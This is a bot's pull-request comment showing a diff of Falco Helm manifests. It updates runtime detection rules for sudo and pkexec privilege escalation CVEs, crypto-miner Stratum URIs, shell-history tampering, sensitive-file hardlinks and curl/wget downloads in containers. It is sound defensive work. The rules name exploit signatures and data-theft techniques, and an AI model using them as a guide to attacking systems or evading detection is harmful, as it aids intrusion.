+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +848,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +882,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1038,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1155,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -938,7 +1383,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1594,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1925,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2040,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2203,6 +2652,7 @@
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2681,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2697,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2282,12 +2719,13 @@
 
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2574,7 +3012,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3050,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3074,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3110,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3124,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3178,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2948,15 +3387,15 @@
       condition: >
         (modify and (
           evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
           evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
           evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
@@ -2964,7 +3403,7 @@
       condition: >
         (open_write and (
           fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
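The change from `contains` to `endswith` for the zsh paths narrows matching to files that actually are history files. A quick sketch of the difference (file paths invented):

```python
# contains vs endswith for shell-history paths (paths are invented).

def old_match(path: str) -> bool:
    return "zsh_history" in path          # previous rule: substring match

def new_match(path: str) -> bool:
    return path.endswith("zsh_history")   # updated rule: suffix match only
```

A real `~/.zsh_history` matches either way; a script that merely mentions the name, such as `/opt/zsh_history_backup.sh`, no longer triggers the updated macro.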
 
@@ -3003,7 +3442,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3521,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3179,7 +3628,7 @@
       condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
       append: false
 
     # The rule is disabled by default.
@@ -3188,13 +3637,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
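The updated condition covers four Stratum URI markers rather than one. In Python terms, the check reduces to a substring scan over the command line (example command lines invented):

```python
# Substring scan for Stratum mining-pool URIs, as in the updated rule.
STRATUM_MARKERS = ("stratum+tcp", "stratum2+tcp", "stratum+ssl", "stratum2+ssl")

def looks_like_stratum(cmdline: str) -> bool:
    return any(marker in cmdline for marker in STRATUM_MARKERS)
```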
@@ -3330,7 +3779,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all file creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3812,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3862,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
      desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudoedit -s or sudoedit -i with a command-line argument that ends with a single backslash character allows an unprivileged user to elevate privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
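The broadened condition now also matches plain `sudo` and the `--login` flag. A hypothetical Python rendering of the check, under the assumption that `proc.args` is available as a single string:

```python
# Hypothetical rendering of the CVE-2021-3156 condition; assumes the
# process arguments arrive as one string (an assumption for this sketch).

def cve_2021_3156_suspect(uid: int, name: str, args: str) -> bool:
    if uid == 0 or name not in ("sudo", "sudoedit"):
        return False
    if not ("-s" in args or "-i" in args or "--login" in args):
        return False
    # trailing backslash or backslash-space in the argument string
    return "\\ " in args or args.endswith("\\")
```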
@@ -3432,7 +3881,7 @@
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
@@ -3460,6 +3909,51 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which the
+    # use of an ingress remote file copy tool in a container is expected.
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    - macro: curl_download
+      condition: proc.name = curl and
+                 (proc.cmdline contains " > " or
+                  proc.cmdline contains " >> " or
+                  proc.cmdline contains " | " or
+                  proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
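The rule combines a fixed binary list with the `curl_download` substring heuristic. A minimal Python sketch of that decision (tool names and commands invented):

```python
# Sketch of the ingress-remote-file-copy decision (commands are invented).
DOWNLOAD_HINTS = (" > ", " >> ", " | ", " -o ",
                  " --output ", " -O ", " --remote-name ")
INGRESS_TOOLS = {"wget"}  # stands in for ingress_remote_file_copy_binaries

def ingress_file_copy(proc_name: str, cmdline: str) -> bool:
    if proc_name in INGRESS_TOOLS:
        return True
    # curl only counts when the command line hints at saving the response
    return proc_name == "curl" and any(h in cmdline for h in DOWNLOAD_HINTS)
```

Note that a bare `curl https://example.com` (output to stdout, not saved) does not match, which is exactly why the macro looks for redirection and output flags rather than the binary name alone.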
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
@@ -3618,6 +4112,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64,
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3741,7 +4248,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
-        k8s.gcr.io/addon-resizer
+        k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
         k8s.gcr.io/k8s-dns-kube-dns-amd64,
@@ -3768,9 +4275,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4326,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -4003,7 +4532,7 @@
    # cluster creation. This may signify a permission setting that is too broad.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4713,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: cfa18541d5243a25e22b1266162a119df07b7063b833909cdba22b3a6204ccf1
+        checksum/rules: 83f9e23d1f49c0a82b7b93bb05f68eecd5d7133e90fb593ddeb9295f58df8d6c
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4725,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.31.1
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4740,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4775,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4804,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4837,8 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

renovate bot changed the title from "chore(deps): update helm release falco to v1.18.5" to "chore(deps): update helm release falco to v1.18.6" on Jun 7, 2022

github-actions bot commented Jun 7, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.18.6

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
